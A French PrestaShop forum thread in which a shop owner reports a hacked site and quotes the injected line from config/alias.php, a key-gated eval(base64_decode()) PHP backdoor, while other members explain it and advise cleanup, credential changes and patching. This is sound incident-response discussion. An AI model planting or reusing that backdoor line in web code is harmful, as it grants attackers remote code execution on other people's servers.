Mühldorfer-france Posted July 23, 2022 Share Posted July 23, 2022 Bonjour, Je viens de recevoir ce mail de la part de mon herbergeur: Qui peut me dire ce qu'il en est? Merci de votre aide Link to comment Share on other sites More sharing options...
Mühldorfer-france Posted July 23, 2022 Author Share Posted July 23, 2022 j'ai comparé ce fichier alias.php avec deux autres que j'ai en sauvegarde: la seule différence est cette ligne en plus: if(md5($_POST['key']) == 'a..........................................e'){eval(base64_decode($_POST['ch']));} (en a et e logiquement il y a des chiffres et des lettres que je viens de remplacer ICI par des .........) Link to comment Share on other sites More sharing options...
Mediacom87 Posted July 23, 2022 Share Posted July 23, 2022 Bonjour, votre hébergeur a fait le job votre site a bien été piraté. 1 Link to comment Share on other sites More sharing options...
Mühldorfer-france Posted July 23, 2022 Author Share Posted July 23, 2022 Just now, Mediacom87 said: Bonjour, votre hébergeur a fait le job votre site a bien été piraté. Bonjour, ok que dois-je faire car je en ligne tout semble ok? Link to comment Share on other sites More sharing options...
Mühldorfer-france Posted July 23, 2022 Author Share Posted July 23, 2022 dois-je juste supprimer la ligne ajoutée? Link to comment Share on other sites More sharing options...
Mediacom87 Posted July 23, 2022 Share Posted July 23, 2022 il y a 29 minutes, Mühldorfer-france a dit : Bonjour, ok que dois-je faire car je en ligne tout semble ok? Corriger le fichier en mettant la version originale de celui-ci, mais surtout savoir comment ils ont modifié le fichier en question pour boucher la faille qui permit l'accès. Link to comment Share on other sites More sharing options...
Mühldorfer-france Posted July 23, 2022 Author Share Posted July 23, 2022 1 minute ago, Mediacom87 said: Corriger le fichier en mettant la version originale de celui-ci, mais surtout savoir comment ils ont modifié le fichier en question pour boucher la faille qui permit l'accès. Merci beaucoup pour votre réponse. Le hic c'est que je n'ai aucune idée de comment ils ont fait car je n'ai eu que cette indication par mon hebergeur Link to comment Share on other sites More sharing options...
Mühldorfer-france Posted July 23, 2022 Author Share Posted July 23, 2022 Bon ca n'a pas un grand intérêt mais pour info, je viens de voir que mon hébergeur m'avait déjà envoyé cette alerte le 4 juillet et en fait leur mail était dans mes spams!! Je pense que ce n'est pas trop grave comme hack dans mon cas car je n'ai eu aucun problème avec mon site ou mes clients entre le 4 juillet et aujourd'hui. Je verifierai demain sur mon serveur que ce fichier alias n'a pas été modifié. Encore merci à @Mediacom87 pour votre disponibilité et votre réactivité et votre professionnalisme. Greg Link to comment Share on other sites More sharing options...
Mediacom87 Posted July 23, 2022 Share Posted July 23, 2022 Il faudrait analyser ce que fait le bout de code rajouté dans le fichier alias, car votre site peut-être devenu un fournisseur de spam et donc que votre adresse ip serveur et votre nom de domaine se retrouve blacklisté et donc que tout vos emails passent en spam à l'avenir. Link to comment Share on other sites More sharing options...
Mühldorfer-france Posted July 23, 2022 Author Share Posted July 23, 2022 1 minute ago, Mediacom87 said: Il faudrait analyser ce que fait le bout de code rajouté dans le fichier alias, car votre site peut-être devenu un fournisseur de spam et donc que votre adresse ip serveur et votre nom de domaine se retrouve blacklisté et donc que tout vos emails passent en spam à l'avenir. Merci mais je fais cela comment? Link to comment Share on other sites More sharing options...
Mediacom87 Posted July 23, 2022 Share Posted July 23, 2022 Il faut trouver le moyen de décodé le code en question Mais bon, avec ce que vous avez mis, le truc vérifie que la variable key passée est bien la bonne, puis s'amuse avec la variable ch, s'il n'y a pas plus, en gros, on peut utiliser votre serveur pour faire tout et n'importe quoi. Link to comment Share on other sites More sharing options...
doekia Posted July 24, 2022 Share Posted July 24, 2022 Pas trop grave !! ?? !!😱 Vous avez juste une backdoor monumentale installée depuis 20 jours. C'est donc open bar depuis cette date (au moins) et cela a de forte chance de signifier que d'autre backdoor ont été déployée - c'est la base de tout hacking. Poser des portes partout pour espérer que lors du nettoyage vous en oubliez. Ce code doit être supprimer et vous devez passer votre shop au peigne fin pour trouver tout autre modif Link to comment Share on other sites More sharing options...
Mühldorfer-france Posted July 24, 2022 Author Share Posted July 24, 2022 5 minutes ago, doekia said: Pas trop grave !! ?? !!😱 Vous avez juste une backdoor monumentale installée depuis 20 jours. C'est donc open bar depuis cette date (au moins) et cela a de forte chance de signifier que d'autre backdoor ont été déployée - c'est la base de tout hacking. Poser des portes partout pour espérer que lors du nettoyage vous en oubliez. Ce code doit être supprimer et vous devez passer votre shop au peigne fin pour trouver tout autre modif Merci beaucoup. J'ai passé au crible le site. seuls 3 fichiers php étaient modifiés. je les ai ai supprimé et remplacés par ceux d'origines. j'ai également suivi les conseils "magiques" de https://www.webbax.ch/2020/09/10/prestashop-anti-hacking/ et modifié mes accés ftp. Apres c'est le monde merveilleux d'internet où rien n'est vraiment sécurisé. Je pense que c'est un hack de masse et qu'ils ont fait cela à grande echelle. Les fichiers concernés etaient: classes/uploader classes/alias classes/tools classes/dispatcher Link to comment Share on other sites More sharing options...
doekia Posted July 25, 2022 Share Posted July 25, 2022 1/ Vos accès FTP sont probablement la dernière chose que vous aviez à changer. Votre url BO, login et mot de passe BO en priorité après désinfection. 2/ Tu as dû te tromper d'entrée sur le blog de Webbax que tu mentionne, ce billet ne dit rien d’intéressant. 3/ J'ai un peu de mal avec le nom de vos fichiers impactés. Si l'ont doit pouvoir reconnaître la signature d'un type d'attaque précis, merci de mettre les noms exacts. Par exemple ici, je ne sais pas si vous parlez de config/alias.php ou de classes/Alias.php. Je suppose le 1er comme précisé dans votre 1er post. 4/ Quelle est votre version exacte ? Si 1.6 inférieure à 1.6.1.23, avez vous patché <admin>/filemanager ? Link to comment Share on other sites More sharing options...
Mühldorfer-france Posted July 25, 2022 Author Share Posted July 25, 2022 4 minutes ago, doekia said: 1/ Vos accès FTP sont probablement la dernière chose que vous aviez à changer. Votre url BO, login et mot de passe BO en priorité après désinfection. 2/ Tu as dû te tromper d'entrée sur le blog de Webbax que tu mentionne, ce billet ne dit rien d’intéressant. 3/ J'ai un peu de mal avec le nom de vos fichiers impactés. Si l'ont doit pouvoir reconnaître la signature d'un type d'attaque précis, merci de mettre les noms exacts. Par exemple ici, je ne sais pas si vous parlez de config/alias.php ou de classes/Alias.php. Je suppose le 1er comme précisé dans votre 1er post. 4/ Quelle est votre version exacte ? Si 1.6 inférieure à 1.6.1.23, avez vous patché <admin>/filemanager ? Bonjour c'était config/alias.php et pour les autres c'était dans classes/...... j'ai une version supérieur à 1.6.1.23 et dans <admin>/filemanager rien n'a été modifié. que voulez-vous dire par "patché"? Merci Greg Link to comment Share on other sites More sharing options...
NicolasV Posted July 25, 2022 Share Posted July 25, 2022 (edited) 4 hours ago, Mühldorfer-france said: J'ai une version supérieur à 1.6.1.23 et dans <admin>/filemanager rien n'a été modifié. que voulez-vous dire par "patché"? Bonjour @Mühldorfer-france, ce que veut dire @doekia, c'est que la version 1.6.1.23 est une version qui a patché la faille filemanager security breaches.Patcher = Corriger Si vous aviez eu une version < à la 1.6.1.23, vous auriez dû patcher ou mettre à jour. Mais dans votre cas, la version que vous avez est protégée. Edited July 25, 2022 by NicolasV (see edit history) Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now